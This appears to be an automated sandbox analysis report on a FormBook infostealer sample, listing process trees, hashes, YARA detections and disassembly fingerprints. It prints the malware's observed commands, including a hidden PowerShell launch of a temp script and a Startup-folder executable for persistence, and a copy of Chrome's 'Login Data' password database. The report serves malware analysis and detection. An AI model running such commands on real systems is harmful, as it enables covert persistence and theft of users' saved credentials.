                                                    Analysis Process: cmd.exe PID: 4548 Parent PID: 6112

                                                    General

                                                    Start time:15:58:01
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd.exe /c timeout 5 & powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
                                                    Imagebase:0x150000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: conhost.exe PID: 4496 Parent PID: 4548

                                                    General

                                                    Start time:15:58:01
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff64e5e0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: timeout.exe PID: 5876 Parent PID: 4548

                                                    General

                                                    Start time:15:58:02
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout 5
                                                    Imagebase:0xf70000
                                                    File size:26112 bytes
                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: powershell.exe PID: 5972 Parent PID: 4548

                                                    General

                                                    Start time:15:58:07
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:powershell -command Start-Process -WindowStyle hidden -FilePath 'C:\Windows\System32\wscript.exe' -ArgumentList 'C:\Users\user\AppData\Local\Temp\\863733.js'; Start-Sleep -s 5; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
                                                    Imagebase:0x300000
                                                    File size:430592 bytes
                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: wscript.exe PID: 7028 Parent PID: 5972

                                                    General

                                                    Start time:15:58:37
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\wscript.exe' C:\Users\user\AppData\Local\Temp\\863733.js
                                                    Imagebase:0x30000
                                                    File size:147456 bytes
                                                    MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: f5cZJ0WC0H.exe PID: 1268 Parent PID: 5972

                                                    General

                                                    Start time:15:58:43
                                                    Start date:27/11/2020
                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
                                                    Imagebase:0x230000
                                                    File size:402944 bytes
                                                    MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: f5cZJ0WC0H.exe PID: 6868 Parent PID: 3472

                                                    General

                                                    Start time:15:58:50
                                                    Start date:27/11/2020
                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe'
                                                    Imagebase:0x690000
                                                    File size:402944 bytes
                                                    MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: f5cZJ0WC0H.exe PID: 6952 Parent PID: 1268

                                                    General

                                                    Start time:15:58:55
                                                    Start date:27/11/2020
                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
                                                    Imagebase:0x660000
                                                    File size:402944 bytes
                                                    MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: explorer.exe PID: 3472 Parent PID: 6952

                                                    General

                                                    Start time:15:58:58
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:
                                                    Imagebase:0x7ff693d90000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: f5cZJ0WC0H.exe PID: 852 Parent PID: 6868

                                                    General

                                                    Start time:15:59:01
                                                    Start date:27/11/2020
                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
                                                    Imagebase:0x620000
                                                    File size:402944 bytes
                                                    MD5 hash:0E7D12AD28411F68D62D3D3F17382B98
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: help.exe PID: 4724 Parent PID: 3472

                                                    General

                                                    Start time:15:59:04
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\help.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\help.exe
                                                    Imagebase:0xb20000
                                                    File size:10240 bytes
                                                    MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    Chronological Activities

                                                    Analysis Process: cmd.exe PID: 3884 Parent PID: 4724

                                                    General

                                                    Start time:15:59:11
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
                                                    Imagebase:0x150000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Chronological Activities

                                                    Analysis Process: conhost.exe PID: 6916 Parent PID: 3884

                                                    General

                                                    Start time:15:59:12
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7ecfc0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Chronological Activities

                                                    Analysis Process: autoconv.exe PID: 5164 Parent PID: 3472

                                                    General

                                                    Start time:15:59:22
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\autoconv.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                    Imagebase:0x1200000
                                                    File size:851968 bytes
                                                    MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Chronological Activities

                                                    Analysis Process: ipconfig.exe PID: 5824 Parent PID: 3472

                                                    General

                                                    Start time:15:59:28
                                                    Start date:27/11/2020
                                                    Path:C:\Windows\SysWOW64\ipconfig.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                    Imagebase:0x9d0000
                                                    File size:29184 bytes
                                                    MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                    Chronological Activities

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >

                                                      Analysis Process: f5cZJ0WC0H.exe PID: 6112 Parent PID: 5644 f5cZJ0WC0H.exeCOMMON

                                                      Executed Functions

                                                      Function 01947A90, Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: fish
                                                      • API String ID: 0-1064584243
                                                      • Opcode ID: b51ae5e7dfdb6fae32c458647cda13aceb116efeea98b1ac274ed38eee470e46
                                                      • Instruction ID: 684643f015d5cac19f7da1af79f68db67e970717783bee4eea271589ab396bcc
                                                      • Opcode Fuzzy Hash: b51ae5e7dfdb6fae32c458647cda13aceb116efeea98b1ac274ed38eee470e46
                                                      • Instruction Fuzzy Hash: F7919270B0071A9FDB18DFA9D890AAEB7B6FF84314F008929D506DB355DB709D45CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 019496C0, Relevance: .4, Instructions: 371COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48a431ddc7103dc9f2b339cd5fa93fc2ca61ff8a4bd12fad0f121e19b411517e
                                                      • Instruction ID: 1826c7d6c9d1f37009daa13594c1a2d850a5fdee31e0eec03356a00e2aa3e49a
                                                      • Opcode Fuzzy Hash: 48a431ddc7103dc9f2b339cd5fa93fc2ca61ff8a4bd12fad0f121e19b411517e
                                                      • Instruction Fuzzy Hash: 7AD1A135A056068FDB19CF68C480DAFB7F6AF88318B168469E50DEB352DB74EC41CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 019491B8, Relevance: .3, Instructions: 304COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5fc1f45bc07b654386d58f7517e3e4f00e4329d06939086d6b5df311bfd83366
                                                      • Instruction ID: 3981b91d5a9a15122c38ade9f280725cf5462d542af6cddcfc6c3ffb88ed0633
                                                      • Opcode Fuzzy Hash: 5fc1f45bc07b654386d58f7517e3e4f00e4329d06939086d6b5df311bfd83366
                                                      • Instruction Fuzzy Hash: 7ED15B35A10219CFCB05CF64D484D9EBBB2FF48315B2A8555EC09AB365DB34E986CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 019491C8, Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 197d5056555dce7f4c0930f0e1a80c39c348439a15368e7a6a6ec0431c11b929
                                                      • Instruction ID: 2d6f89f6ed4c59d1336eb80e13a0571e810ce4223eb0ee730c8caa70d8422184
                                                      • Opcode Fuzzy Hash: 197d5056555dce7f4c0930f0e1a80c39c348439a15368e7a6a6ec0431c11b929
                                                      • Instruction Fuzzy Hash: 3CB14B35A1021ACFCB05CF64D484D9EFBB2FF88304B268655E809AB361D774E982CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01945367, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 01945421
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 3c95d5ceb4fe5efbb0b770678e0dbce7fb0a3cda244720cb570c12a5e35a4d89
                                                      • Instruction ID: c861dc9e0e7a8ec2d4533fd5d461f2538f4fa87cbabbbc9b831e186e7e06f66f
                                                      • Opcode Fuzzy Hash: 3c95d5ceb4fe5efbb0b770678e0dbce7fb0a3cda244720cb570c12a5e35a4d89
                                                      • Instruction Fuzzy Hash: 8E41F271D04368CFDB24CFA9C884B8EBBB5BF49308F258059D408AB251DB756985CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 019438A8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 01945421
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: be6a8c5ce63989ed5056a7a54ad63640fa851a8dffa337cb703d44c277359251
                                                      • Instruction ID: 20cffa4ecb19da48dd576fdfce7f8b9c40cb87ebd7e7ac9671498ccf8ed86544
                                                      • Opcode Fuzzy Hash: be6a8c5ce63989ed5056a7a54ad63640fa851a8dffa337cb703d44c277359251
                                                      • Instruction Fuzzy Hash: BB41E271D04718CFDB24CFAAC884B8EBBB5BF48308F258059D509AB251DB756985CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 0194F928, Relevance: .5, Instructions: 473COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6e4f09caea978c26f8b5c80257254b152ce1df9e58b3fc83aa7398d079db84df
                                                      • Instruction ID: 78f08afcb952c257a0fbc8b828ed59811b72d2cf51f634ce701b63f01e6f4811
                                                      • Opcode Fuzzy Hash: 6e4f09caea978c26f8b5c80257254b152ce1df9e58b3fc83aa7398d079db84df
                                                      • Instruction Fuzzy Hash: 8F02B435A043168FCB05CF69C880DAFBBB6FF89300B15856AE909DB255D731ED45CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0194F128, Relevance: .4, Instructions: 419COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c1427bf2b035da80d1791a97dcfb0685febd54aa25424fd1bd5906c94154812
                                                      • Instruction ID: 40942ec8cdd3b5bb466c8458afd8abdededfd0469393ede9466815797773bfa1
                                                      • Opcode Fuzzy Hash: 4c1427bf2b035da80d1791a97dcfb0685febd54aa25424fd1bd5906c94154812
                                                      • Instruction Fuzzy Hash: CEE1C532E10A07CBCB11CF69C9019EEF7F2AF8E701B268559D5457B610D7B1AE85CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0194CEC8, Relevance: .4, Instructions: 395COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d5d574b0fe8705a63af9bd1705ac32351784aa725ec6ca3d7a4e1ecd4db92aa2
                                                      • Instruction ID: 329d0c953e1724660dcd95e3e537f9fcf00e42fc0f6c17ec395aa2366b857132
                                                      • Opcode Fuzzy Hash: d5d574b0fe8705a63af9bd1705ac32351784aa725ec6ca3d7a4e1ecd4db92aa2
                                                      • Instruction Fuzzy Hash: 15F1D170A042168FCB15CF69C8809AEFBF2FFC9300B15C6A9D549EB255DB34A945CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0194D369, Relevance: .1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 939ea2be076bd654635fcb95858e394f715349011fbf7a3885efdbf56de1b249
                                                      • Instruction ID: 7f948b24c6aa1de79c0b3391ed4435b8a3e1b85549f3dea82b67bdbf7c02f009
                                                      • Opcode Fuzzy Hash: 939ea2be076bd654635fcb95858e394f715349011fbf7a3885efdbf56de1b249
                                                      • Instruction Fuzzy Hash: 4021603A7443A30BF7158DFADC91BEB7AD7A7D179AF0CC035AC59C6185DA6CC8408254
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0194D378, Relevance: .1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.244628595.0000000001940000.00000040.00000001.sdmp, Offset: 01940000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d044e4f756309473d585e9fb730d82dcc5ee1a08549fd742722d5df2abe08430
                                                      • Instruction ID: acb56bca4253f1bf6272d177365cc3c0dd3b461e304dad5682028add3bf7586c
                                                      • Opcode Fuzzy Hash: d044e4f756309473d585e9fb730d82dcc5ee1a08549fd742722d5df2abe08430
                                                      • Instruction Fuzzy Hash: C3212B2A3547A30BF7158DFBAD81BAB7ACBA7D169AF0CC435AD58C5085DA2CC5014164
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Analysis Process: powershell.exe PID: 5972 Parent PID: 4548 powershell.exeCOMMON

                                                      Executed Functions

                                                      Function 05336CB0, Relevance: .3, Instructions: 318COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.339535372.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a69cb6710720c515b613f498217e90a5bd214aea277a58649a19bfa1d74bca6
                                                      • Instruction ID: 5303d4ae86afe010bcfdbbdbbbe1704120634087c6131803b4d6f3b54677131e
                                                      • Opcode Fuzzy Hash: 7a69cb6710720c515b613f498217e90a5bd214aea277a58649a19bfa1d74bca6
                                                      • Instruction Fuzzy Hash: A9D17A74A002189FCB05DFA4C541BEEBBF2BF89304F158468D805AF395DB75AE46CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05336C81, Relevance: .2, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.339535372.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5f9621bda47c3bca62acd0b7e2500ea275fa3980ed05ac0405e6f3217f749876
                                                      • Instruction ID: 9393ba2062b2a680e798740d6fa5cea9aa204593c1dd590943136a588b168f28
                                                      • Opcode Fuzzy Hash: 5f9621bda47c3bca62acd0b7e2500ea275fa3980ed05ac0405e6f3217f749876
